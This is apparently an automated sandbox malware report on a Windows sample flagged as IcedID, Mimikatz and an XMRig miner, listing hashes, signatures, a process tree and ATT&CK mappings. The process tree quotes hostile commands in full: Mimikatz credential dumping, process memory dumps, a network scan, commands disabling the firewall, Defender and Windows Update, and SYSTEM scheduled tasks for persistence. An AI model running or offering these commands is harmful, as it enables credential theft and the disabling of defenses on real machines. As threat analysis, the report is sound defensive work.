Analysis

  • max time kernel
    159s
  • max time network
    169s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-04-2024 11:28

General

  • Target

    2024-04-20_83ccc31e8a8d6e728e3f687c1225b122_hacktools_icedid_mimikatz.exe

  • Size

    9.9MB

  • MD5

    83ccc31e8a8d6e728e3f687c1225b122

  • SHA1

    37304d9ad07f6e7c83b64ec8383e1b0715854dc2

  • SHA256

    ff08b544316044d16e41892911890ecdb8a3c176c75d4ca33492fe2ac72ae321

  • SHA512

    d0c13572e7dd8deb8c921491006f8e89aabc3c65d9de6059937fd7386cdb81b92e133ee5ff15c10d11a54cb4c2664466963e479b1a7881c9e91bec74a37b19fe

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
  • UPX dump on OEP (original entry point) 16 IoCs
  • XMRig Miner payload 3 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Creates a Windows Service
  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 57 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1896
      • C:\Windows\TEMP\vzignttnc\ybtnut.exe
        "C:\Windows\TEMP\vzignttnc\ybtnut.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2452
    • C:\Users\Admin\AppData\Local\Temp\2024-04-20_83ccc31e8a8d6e728e3f687c1225b122_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-20_83ccc31e8a8d6e728e3f687c1225b122_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4956
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rkilesrw\naustif.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1356
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:4844
        • C:\Windows\rkilesrw\naustif.exe
          C:\Windows\rkilesrw\naustif.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4160
    • C:\Windows\rkilesrw\naustif.exe
      C:\Windows\rkilesrw\naustif.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3652
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4984
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2284
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:1588
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:4404
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:4276
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:5088
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:3056
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:2544
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:1516
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\tteyulnen\igasksjja\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4176
                          • C:\Windows\tteyulnen\igasksjja\wpcap.exe
                            C:\Windows\tteyulnen\igasksjja\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:4920
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3588
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:2976
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1612
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:772
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2604
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:3872
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:2908
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:3976
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:2316
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2428
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:1516
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:1508
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:916
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:4444
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\tteyulnen\igasksjja\eblttilyr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tteyulnen\igasksjja\Scant.txt
                                                2⤵
                                                  PID:1420
                                                  • C:\Windows\tteyulnen\igasksjja\eblttilyr.exe
                                                    C:\Windows\tteyulnen\igasksjja\eblttilyr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tteyulnen\igasksjja\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:1248
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\tteyulnen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tteyulnen\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:2916
                                                  • C:\Windows\tteyulnen\Corporate\vfshost.exe
                                                    C:\Windows\tteyulnen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4948
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tfintytmv" /ru system /tr "cmd /c C:\Windows\ime\naustif.exe"
                                                  2⤵
                                                    PID:4056
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:4080
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "tfintytmv" /ru system /tr "cmd /c C:\Windows\ime\naustif.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:1164
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anlmrcstj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F"
                                                      2⤵
                                                        PID:3584
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:3064
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "anlmrcstj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:4672
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iazatujnv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F"
                                                          2⤵
                                                            PID:3552
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:3884
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "iazatujnv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:2368
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:2208
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:4752
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:1828
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:4244
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:1356
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:376
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:4500
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:1248
                                                                            • C:\Windows\TEMP\tteyulnen\skyttnyln.exe
                                                                              C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 800 C:\Windows\TEMP\tteyulnen\800.dmp
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1940
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:2124
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:3452
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:2604
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:4388
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:3620
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:4172
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:3012
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:1084
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:2380
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:2240
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:4336
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:4076
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:3520
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:952
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:1860
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:1880
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:3828
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:4344
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:3296
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:4752
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:3772
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:4884
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:4896
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5032
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:4976
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc config WinDefend start= disabled
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:3468
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                                        2⤵
                                                                                                                          PID:2144
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config wuauserv start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:1136
                                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2456
                                                                                                                        • C:\Windows\TEMP\tteyulnen\skyttnyln.exe
                                                                                                                          C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 336 C:\Windows\TEMP\tteyulnen\336.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1648
                                                                                                                        • C:\Windows\TEMP\tteyulnen\skyttnyln.exe
                                                                                                                          C:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 1896 C:\Windows\TEMP\tteyulnen\1896.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2380
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2232 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8
                                                                                                                        1⤵
                                                                                                                          PID:4184
                                                                                                                        • C:\Windows\SysWOW64\gykgye.exe
                                                                                                                          C:\Windows\SysWOW64\gykgye.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2916

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                        Execution

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Persistence

                                                                                                                        Create or Modify System Process

                                                                                                                        1
                                                                                                                        T1543

                                                                                                                        Windows Service

                                                                                                                        1
                                                                                                                        T1543.003

                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                        1
                                                                                                                        T1547

                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                        1
                                                                                                                        T1547.001

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Privilege Escalation

                                                                                                                        Create or Modify System Process

                                                                                                                        1
                                                                                                                        T1543

                                                                                                                        Windows Service

                                                                                                                        1
                                                                                                                        T1543.003

                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                        1
                                                                                                                        T1547

                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                        1
                                                                                                                        T1547.001

                                                                                                                        Scheduled Task/Job

                                                                                                                        1
                                                                                                                        T1053

                                                                                                                        Defense Evasion

                                                                                                                        Impair Defenses

                                                                                                                        1
                                                                                                                        T1562

                                                                                                                        Disable or Modify System Firewall

                                                                                                                        1
                                                                                                                        T1562.004

                                                                                                                        Modify Registry

                                                                                                                        1
                                                                                                                        T1112

                                                                                                                        Discovery

                                                                                                                        Query Registry

                                                                                                                        1
                                                                                                                        T1012

                                                                                                                        System Information Discovery

                                                                                                                        1
                                                                                                                        T1082

                                                                                                                        Remote System Discovery

                                                                                                                        1
                                                                                                                        T1018

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Windows\SysWOW64\Packet.dll
                                                                                                                          Filesize

                                                                                                                          95KB

                                                                                                                          MD5

                                                                                                                          86316be34481c1ed5b792169312673fd

                                                                                                                          SHA1

                                                                                                                          6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                                          SHA256

                                                                                                                          49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                                          SHA512

                                                                                                                          3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                                        • C:\Windows\SysWOW64\wpcap.dll
                                                                                                                          Filesize

                                                                                                                          275KB

                                                                                                                          MD5

                                                                                                                          4633b298d57014627831ccac89a2c50b

                                                                                                                          SHA1

                                                                                                                          e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                                          SHA256

                                                                                                                          b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                                          SHA512

                                                                                                                          29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                                        • C:\Windows\TEMP\tteyulnen\336.dmp
                                                                                                                          Filesize

                                                                                                                          33.5MB

                                                                                                                          MD5

                                                                                                                          bd9b419fbc20402d617d3a96a3029192

                                                                                                                          SHA1

                                                                                                                          d46cdcef593f3f3aeaddd2ffdfad0d80b3605af3

                                                                                                                          SHA256

                                                                                                                          08bcce95291b1bfcf4cf544a6393ea6df860d6edf49c2cf8ea52d3cd1eb72c7a

                                                                                                                          SHA512

                                                                                                                          b2634efa03fa63e5b82e4cf61b0d630f41f534110b0b6120c6a76d03b765b86face4eb0119e19f758bb50255e484e40dd382087ca96f9dfb9bc930f4a2dfe5d2

                                                                                                                        • C:\Windows\TEMP\tteyulnen\800.dmp
                                                                                                                          Filesize

                                                                                                                          1.9MB

                                                                                                                          MD5

                                                                                                                          6d57de86e93c09a4eda2d6ff845aa9d5

                                                                                                                          SHA1

                                                                                                                          0aa1343abbcd1a3b3dbab5ab31c811b07b2a17c3

                                                                                                                          SHA256

                                                                                                                          15890003c49def17a4ddc70160802bda0a450b1ccceab51d0e54da37de4dc06f

                                                                                                                          SHA512

                                                                                                                          fdd1f017610aec287458c26adf94bf60c50b97d8072d2a2ac9d5185bc44c22e70f5e5bd83cea3f2e331ee3be8551db67d3ea3d3ce1f8efe1549653a1b0d0e931

                                                                                                                        • C:\Windows\TEMP\vzignttnc\config.json
                                                                                                                          Filesize

                                                                                                                          693B

                                                                                                                          MD5

                                                                                                                          f2d396833af4aea7b9afde89593ca56e

                                                                                                                          SHA1

                                                                                                                          08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                                                                          SHA256

                                                                                                                          d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                                                                          SHA512

                                                                                                                          2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                                                                        • C:\Windows\Temp\nsy7150.tmp\System.dll
                                                                                                                          Filesize

                                                                                                                          11KB

                                                                                                                          MD5

                                                                                                                          2ae993a2ffec0c137eb51c8832691bcb

                                                                                                                          SHA1

                                                                                                                          98e0b37b7c14890f8a599f35678af5e9435906e1

                                                                                                                          SHA256

                                                                                                                          681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                                                                                          SHA512

                                                                                                                          2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                                                                                        • C:\Windows\Temp\nsy7150.tmp\nsExec.dll
                                                                                                                          Filesize

                                                                                                                          6KB

                                                                                                                          MD5

                                                                                                                          b648c78981c02c434d6a04d4422a6198

                                                                                                                          SHA1

                                                                                                                          74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                                                                                          SHA256

                                                                                                                          3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                                                                                          SHA512

                                                                                                                          219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                                                                                        • C:\Windows\Temp\tteyulnen\skyttnyln.exe
                                                                                                                          Filesize

                                                                                                                          126KB

                                                                                                                          MD5

                                                                                                                          e8d45731654929413d79b3818d6a5011

                                                                                                                          SHA1

                                                                                                                          23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                                                                                          SHA256

                                                                                                                          a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                                                                                          SHA512

                                                                                                                          df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                                                                                        • C:\Windows\Temp\vzignttnc\ybtnut.exe
                                                                                                                          Filesize

                                                                                                                          343KB

                                                                                                                          MD5

                                                                                                                          2b4ac7b362261cb3f6f9583751708064

                                                                                                                          SHA1

                                                                                                                          b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                                                                                          SHA256

                                                                                                                          a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                                                                                          SHA512

                                                                                                                          c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                                                                                        • C:\Windows\Temp\xohudmc.exe
                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                          MD5

                                                                                                                          cbefa7108d0cf4186cdf3a82d6db80cd

                                                                                                                          SHA1

                                                                                                                          73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                                                                                          SHA256

                                                                                                                          7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                                                                                          SHA512

                                                                                                                          b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                                                                                        • C:\Windows\rkilesrw\naustif.exe
                                                                                                                          Filesize

                                                                                                                          10.0MB

                                                                                                                          MD5

                                                                                                                          44d946bbdc5ecad797b086aa25a3cc44

                                                                                                                          SHA1

                                                                                                                          517f46ee376496b3fbb7ca2c3f05b77e88f82875

                                                                                                                          SHA256

                                                                                                                          12591d67f592e7af13f099f355eabb58535970d6cfedeb02b1c44e4fd954fe30

                                                                                                                          SHA512

                                                                                                                          899ca8c44cb7edc7760225f1ecc06c7caa0ea505e60fa5427a767d7c0ad279ca97f6f28b40573153b4c7c552bb65cef0b4c2977dd1a38ae42c13fc90c30003a7

                                                                                                                        • C:\Windows\system32\drivers\etc\hosts
                                                                                                                          Filesize

                                                                                                                          1KB

                                                                                                                          MD5

                                                                                                                          c838e174298c403c2bbdf3cb4bdbb597

                                                                                                                          SHA1

                                                                                                                          70eeb7dfad9488f14351415800e67454e2b4b95b

                                                                                                                          SHA256

                                                                                                                          1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                                                                                                          SHA512

                                                                                                                          c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                                                                                                        • C:\Windows\tteyulnen\Corporate\vfshost.exe
                                                                                                                          Filesize

                                                                                                                          381KB

                                                                                                                          MD5

                                                                                                                          fd5efccde59e94eec8bb2735aa577b2b

                                                                                                                          SHA1

                                                                                                                          51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                                                                                          SHA256

                                                                                                                          441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
